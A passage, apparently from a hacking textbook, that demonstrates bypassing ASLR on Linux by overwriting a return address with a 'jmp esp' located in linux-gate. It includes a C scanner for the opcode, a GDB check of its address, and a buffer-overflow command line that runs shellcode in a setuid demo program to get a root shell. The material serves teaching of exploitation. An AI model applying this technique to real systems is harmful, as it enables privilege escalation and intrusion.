Graphics Programs Reference
In-Depth Information
find_jmpesp.c
int main()
{
unsigned long linuxgate_start = 0xffffe000;
char *ptr = (char *) linuxgate_start;
int i;
for(i=0; i < 4096; i++)
{
if(ptr[i] == '\xff' && ptr[i+1] == '\xe4')
printf("found jmp esp at %p\n", ptr+i);
}
}
When the program is compiled and run, it shows that this instruction
exists at
0xffffe777
. This can be further verified using GDB:
matrix@loki /hacking $ ./find_jmpesp
found jmp esp at 0xffffe777
matrix@loki /hacking $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483f0: file aslr_demo.c, line 7.
(gdb) run
Starting program: /hacking/aslr_demo
Breakpoint 1, main (argc=1, argv=0xbf869894) at aslr_demo.c:7
7 printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777: jmp esp
(
gdb)
Putting it all together, if we overwrite the return address with the address
0xffffe777
, then execution will jump into linux-gate when the main function
returns. Since this is a
jmp esp
instruction, execution will immediately jump
back out of linux-gate to wherever ESP happens to be pointing. From our
previous debugging, we know that at the end of the main function, ESP is
pointing to memory directly after the return address. So if shellcode is put
here, EIP should bounce right into it.
matrix@loki /hacking $ sudo chown root:root ./aslr_demo
matrix@loki /hacking $ sudo chmod u+s ./aslr_demo
matrix@loki /hacking $ ./aslr_demo $(perl -e 'print "\x77\xe7\xff\xff"x20')$(cat scode.bin)
buffer is at 0xbf8d9ae0
s
h-3.1#
This technique can also be used to exploit the notesearch program, as
shown here.
